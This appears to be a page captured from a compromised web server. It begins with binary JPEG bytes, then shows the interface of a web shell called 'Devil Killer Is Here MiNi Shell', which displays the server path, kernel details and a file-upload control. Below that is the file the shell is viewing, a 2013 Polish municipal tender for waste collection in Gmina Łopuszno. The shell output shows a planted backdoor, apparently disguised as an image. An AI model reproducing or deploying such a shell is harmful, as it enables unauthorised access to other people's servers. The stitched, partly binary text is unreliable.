JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130611/224234-N-2013.html

<p class="kh_header"><b>Łopuszno: Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Łopuszno</b><br>
<b>Numer ogłoszenia: 224234 - 2013; data zamieszczenia: 11.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łopuszno , ul. Konecka 12, 26-070 Łopuszno, woj. świętokrzyskie, tel. 41 3914009, faks 41 3914054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lopuszno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Łopuszno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest odbieranie i zagospodarowanie odpadów komunalnych z nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie Gminy Łopuszno, w sposób zgodny z przepisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz. U. 2012.391 ze zm.), zapisami Planu Gospodarki Odpadami dla województwa świętokrzyskiego 2012-2018, przyjętego uchwałą nr XXI/361/12 Sejmiku Województwa Świętokrzyskiego z dnia 28 czerwca 2012 r. w sprawie wykonania Planu Gospodarki Odpadami dla województwa świętokrzyskiego 2012-2018, oraz przepisami Regulaminu utrzymania czystości i porządku na terenie Gminy Łopuszno, a także innymi przepisami prawa ustawowego i miejscowego.
2. Charakterystyka Gminy Łopuszno
- Powierzchnia gminy - 17 681 ha (176,81 km2)
- Liczba mieszkańców na terenie Gminy Łopuszno wynosi 9 129 osób (stan na dzień 01.01.2013r. wg zameldowania). Szacuje się, że w czasie realizacji umowy liczba ludności może wzrosnąć o 2%  (tj. około 182 osób) gdzie:
- w zabudowie jednorodzinnej - 8889 osób
- w zabudowie wielorodzinnej -   240 osób
- Gmina liczy 42 miejscowości: Antonielów, Barycz, Czałczyn, Czartoszowy, Dobrzeszów, Eustachów, Eustachów Dąbrowa, Eustachów Duży, Eustachów Mały, Ewelinów, Ewelinów Fryszerka, Ewelinów Knieje, Fanisławice, Fanisławice Hucisko, Fanisławice Przymiarki,  Fanisławiczki, Gnieździska, Grabownica, Huta Jabłonowa,  Jasień, Jedle, Józefina, Krężołek, Lasocin, Łopuszno, Marianów, Michala Góra, Naramów, Nowa Skałka,  Nowek, Olszówka, Orczów, Piotrowiec, Podewsie, Przegrody,  Ruda Zajączkowska, Rudniki, Sarbice Pierwsze, Sarbice Drugie, Snochowice, Skałka Polska, Wielebnów, Zasłońce.
3. Podstawowe dane o uwarunkowaniach zamówienia: (stan na 31.12.2013r.)
- Szacunkowa ilość odpadów komunalnych z terenu Gminy Łopuszno do odebrania i zagospodarowania, w okresie rocznym odpadów niesegregowanych 500 Mg/rok, segregowanych 400,00 Mg/rok, w trakcie realizacji zamówienia - okres 1,5 roku segregowane - 600 Mg, niesegregowane 750 Mg
- Szacunkowa liczba nieruchomości jednorodzinnych do obsługi, na których zamieszkują mieszkańcy wynosi około 2556  budynków jednorodzinnych, 14 budynków wielorodzinnych, (z czterech lokalizacji odpady niesegregowane będą odbierane w pojemnikach istniejących Kp-7, w pozostałych w systemie workowym jak w zabudowie jednorodzinnej).
Ilość pojemników Kp-7 z których należy odebrać odpady 4szt.
- szacunkowa ilość worków, w które należy wyposażyć mieszkańców do selektywnej zbiórki odpadów o poj. 60 l. w kolorze niebieski, żółty, zielony na pierwsze wyposażenie - 1500 szt. brązowych 200 szt. szacunkowa ilość worków czarnych na pierwsze wyposażenie o pojemności 120 l - 6100 szt., w okresie realizacji usługi dostarczenie worków na wymianę, zarówno do odpadów segregowanych (do końca wykonania usługi)jak i niesegregowanych ( do dnia 30 czerwiec 2014r.)
- szacunkowa ilość pojemników o pojemności 120 l, w którą należy wyposażyć mieszkańców do dnia 30 czerwca 2014 r. (zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Łopuszno) na odpady niesegregowane -2556 szt.(zabudowa jednorodzinna) Pojemniki wolnostojące powinny być wyposażone w kółka oraz w szczelną zamykaną klapę, oraz spełniające normy techniczne. Na odpady niesegregowane przy zabudowie budynkami wielolokalowymi  pojemniki stanowiące minimum iloczyn 100 litrów i liczby lokali . (zgodnie z wykazem dostarczonym przez Zamawiającego do dnia 30 czerwca 2014 r.) jednakże ilość nie większa niż 15 szt.).
4. Charakterystyka przedmiotu zamówienia:
Przedmiotem zamówienia jest odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Łopuszno.
Wyposażenie zamieszkałych nieruchomości oraz nowych nieruchomości zamieszkałych w trakcie realizacji umowy, w odpowiednią i właściwą ilość worków, oraz pojemników do selektywnej zbiórki odpadów przy zabudowie wielorodzinnej  należy do wykonawcy. Worki do selektywnej zbiórki odpadów muszą być oznaczone rodzajem odpadów na jakie mają być przeznaczone, i oznaczenie Gmina Łopuszno.
Mieszkańcy będą gromadzić odpady w następujących rodzajach worków:
kolor niebieski - papier i tektura (poj. 60 l.)
kolor żółty - tworzywa sztucznie, metal i opakowania wielomateriałowe (poj. 60 l.)
kolor zielony - szkło bezbarwne i kolorowe (poj. 60 l.)
kolor brązowy - odpady ulegające biodegradacji (poj. 60l.)
kolor czarny - odpady niesegregowane (zmieszane) (poj. 120 l.)
Zakres prac obejmuje:
a. Ustalenie i uzgodnienie z Zamawiającym szczegółowych harmonogramów wykonania usługi na cały okres trwania usługi,
b. Terminowy i właściwy odbiór odpadów komunalnych z nieruchomości według ustalonych harmonogramów,
c. Odbiór wystawionych w workach przed nieruchomość odpadów i ich zagospodarowanie zgodnie z obowiązującymi przepisami prawa, 
d. Odbiór pojemników Kp-7 z zabudowy wielorodzinnej - na zgłoszenie Zamawiającego, jednak nie rzadziej niż raz w miesiącu.
e. Czynności odbioru odpadów należy dokonać w godz. 700-1800, z zastrzeżeniem,
iż z nieruchomości do jednego samochodu nie wolno zbierać jednocześnie odpadów zmieszanych wraz z pozostałymi z segregacji,
f. Po odebraniu worków z odpadami, w przypadku rozsypania należy miejsce odbioru uprzątnąć,
g. Zawarcie umów i okazanie Zamawiającemu w zakresie przekazania odebranych odpadów do Regionalnej Instalacji Przetwarzania odpadów zgodnie z zapisami Planu Gospodarki Odpadami dla województwa świętokrzyskiego 2012-2018,
h. Terminowe i właściwe przygotowanie sprawozdań wymaganych przepisami prawa i przekazanie ich do zamawiającego,
i. Naprawiać lub ponosić koszty naprawy szkód wyrządzonych podczas wykonywania usługi wywozu odpadów na terenie Gminy Łopuszno,
j. Odebrania całej masy odpadów komunalnych, przekazanych przez właścicieli nieruchomości, w sposób selektywny oraz odpadów zmieszanych,
k. Kontrola ilości odebranych odpadów niesegregowanych, (wzrokowa, czy odpady znajdują się w oznaczonych workach),
l. Kontrola jakości odpadów segregowanych i zgłoszenie nieprawidłowości Zamawiającemu (wzrokowa, czy odpady znajdują się w oznakowanych workach),
m. Odbiór odpadów segregowanych oraz niesegregowanych  - 1 raz w miesiącu,
n. Wykonawca zobowiązany jest do przekazania wszystkich zmieszanych (niesegregowanych) odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania w Rejonie 4 dla województwa świętokrzyskiego lub w przypadku awarii do instalacji zastępczej określonej w Planie Gospodarki Odpadami dla województwa świętokrzyskiego, dopuszcza się przekazanie odpadów segregowanych do instalacji.
Rodzaje odpadów komunalnych odbieranych selektywnie od właścicieli nieruchomości - art. 6d ust. 4 pkt. 2 ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (tj. Dz.U.2012.391 ze zm.)
- papier i tektura (kod odpadu: 15 01 01, 20 01 01)
- szkło (kod odpadu: 15 01 07, 20 01 02)
- tworzywa sztuczne ( kod odpadu: 15 01 02)
- metal (kod odpadu: 15 01 04)
- opakowania wielomateriałowe ( kod odpadu: 15 01 05)
- odpady ulegające biodegradacji (kod odpadu: 20 01 08, 20 02 01)
-odpady komunalne nie wymienione w innych podgrupach (kod odpadu: 20 03 99)
- odpady komunalne niesegregowane (zmieszane) powstałe na nieruchomościach oznaczone kodem odpadu: 20 03 01.
Wykonawca zobowiązany jest do zagospodarowania wszystkich odebranych odpadów selektywnie zebranych według powszechnie obowiązujących przepisów prawa, zgodnie z hierarchią postępowania z odpadami.
Wykonawca zobowiązany jest:
- zapewnić, aby pojazdy i urządzenia wykorzystywane przy odbiorze i przewozie odpadów komunalnych były zabezpieczone przed niekontrolowanym wydostaniem się na zewnątrz odpadów, podczas ich gromadzenia, przeładunku a także transportu,
- myć i dezynfekować pojazdy i urządzenia z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego i posiadać stosowną dokumentację, którą należy udostępnić na żądanie Zamawiającego.
Wykonawca w trakcie realizacji zamówienia ma obowiązek prowadzenia pełnej dokumentacji wymaganej obowiązującymi w danym czasie przepisami prawa.
Sprawozdania należy przekazywać na obowiązującym druku w formie elektronicznej na adres: gmina@lopuszno.pl i papierowej na adres Urzędu Gminy w Łopusznie, ul. Konecka 12, 26-070 Łopuszno, w ustawowych terminach.
Sprawozdanie winno być opatrzone datą oraz imieniem i nazwiskiem osoby sporządzającej w imieniu Wykonawcy oraz uzyskać akceptację osoby reprezentującej Wykonawcę.
W celu weryfikacji danych zawartych w sprawozdaniu, Zamawiający może zobowiązać Wykonawcę odbierającego odpady komunalne od właścicieli nieruchomości do okazania dokumentów sporządzonych na potrzeby ewidencji odpadów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.40.00-3, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium o wysokości 10 000,- zł (słownie: dziesięć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) aktualny wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Łopuszno w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości - do oferty dołączona kopia zaświadczenia wydanego przez Wójta o wpisie do rejestru działalności regulowanej. 
b) aktualne zezwolenie starosty na transport odpadów komunalnych, w tym niebezpiecznych odpadów komunalnych,
c) aktualne zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów komunalnych lub gotowość przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów. Miejsca odzysku lub unieszkodliwiania odpadów, o których mowa wyżej powinny spełniać warunki określone w ustawie z dnia 27 kwietnia 2001r. o odpadach, ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>prowadzenie działalności w zakresie odzysku lub unieszkodliwiania odpadów w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - Wykonawcy zobowiązani są do wykazania odbioru i przekazania do odzysku lub unieszkodliwienia odpadów komunalnych w ilości co najmniej 2.000 Mg w każdym roku prowadzonej działalności.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) posiadanie bazy transportowo - magazynowej - zgodnie z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013.122),
b) posiadania sprzętu niezbędnego do wykonywania przedmiotu umowy określonego w SIWZ - zgodnie z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013.122),
c) zamawiający wymaga, aby Wykonawca dysponował co najmniej następującymi pojazdami:
A) dwa pojazdy przystosowane do odbioru zmieszanych odpadów komunalnych;
B) dwa pojazdy przystosowane do odbioru selektywnie zbieranych odpadów komunalnych;
C) jeden samochód, do odbierania odpadów bez funkcji kompaktującej;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, minimalna suma gwarancyjna ubezpieczenia to 300 000 zł (słownie: trzysta tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzenia pisemnych zmian do postanowień umowy na podstawie art. 144 ust. 1 ustawy PZP w przypadku wystąpienia jednej z następujących okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i na warunkach określonych poniżej:
1). Zmiana sposobu spełnienia świadczenia
Zmiany technologiczne a w szczególności:
a) Pojawienie się nowszej technologii wykonania przedmiotu zamówienia pozwalającej na zaoszczędzenie jego kosztów,
b) Zmiana zakresu usług przez wprowadzenie nowych posesji do określonych w załącznikach do umowy wynikająca z potrzeb Zamawiającego.
2). Zmiany osobowe i dane teleadresowe.
a) Zmiana podmiotów lub osób przedstawionych w ofercie, przy pomocy, których Wykonawca realizuje przedmiot umowy na inne spełniające warunki przedstawione w SIWZ, będzie możliwa jedynie za uprzednią zgodą Zamawiającego, akceptującego nowa osobę lub podmiot. Wykonawca z własnej inicjatywy zaproponuje zmianę osoby lub podmiotu w następujących przypadkach:
- śmierci, choroby lub innych zdarzeń losowych,
- niewywiązywania się osoby lub podmiotu z obowiązków wynikających z umowy,
- jeżeli zmiana osoby lub podmiotu stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy.
b) Zamawiający może zażądać od Wykonawcy zmiany osoby lub podmiotu, jeżeli uzna, że nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest dokonać zmiany w terminie wskazanym we wniosku Zamawiającego,
c) Zmiany danych teleadresowych i numerów konta.
d) Zmiana danych związanych z obsługą administracyjno-organizacyjną umowy.
e) Zmiana umowy na skutek zmiany formy organizacyjno-prawnej, przekształcenia lub połączenia Wykonawcy lub Zamawiającego.
3) Płatności
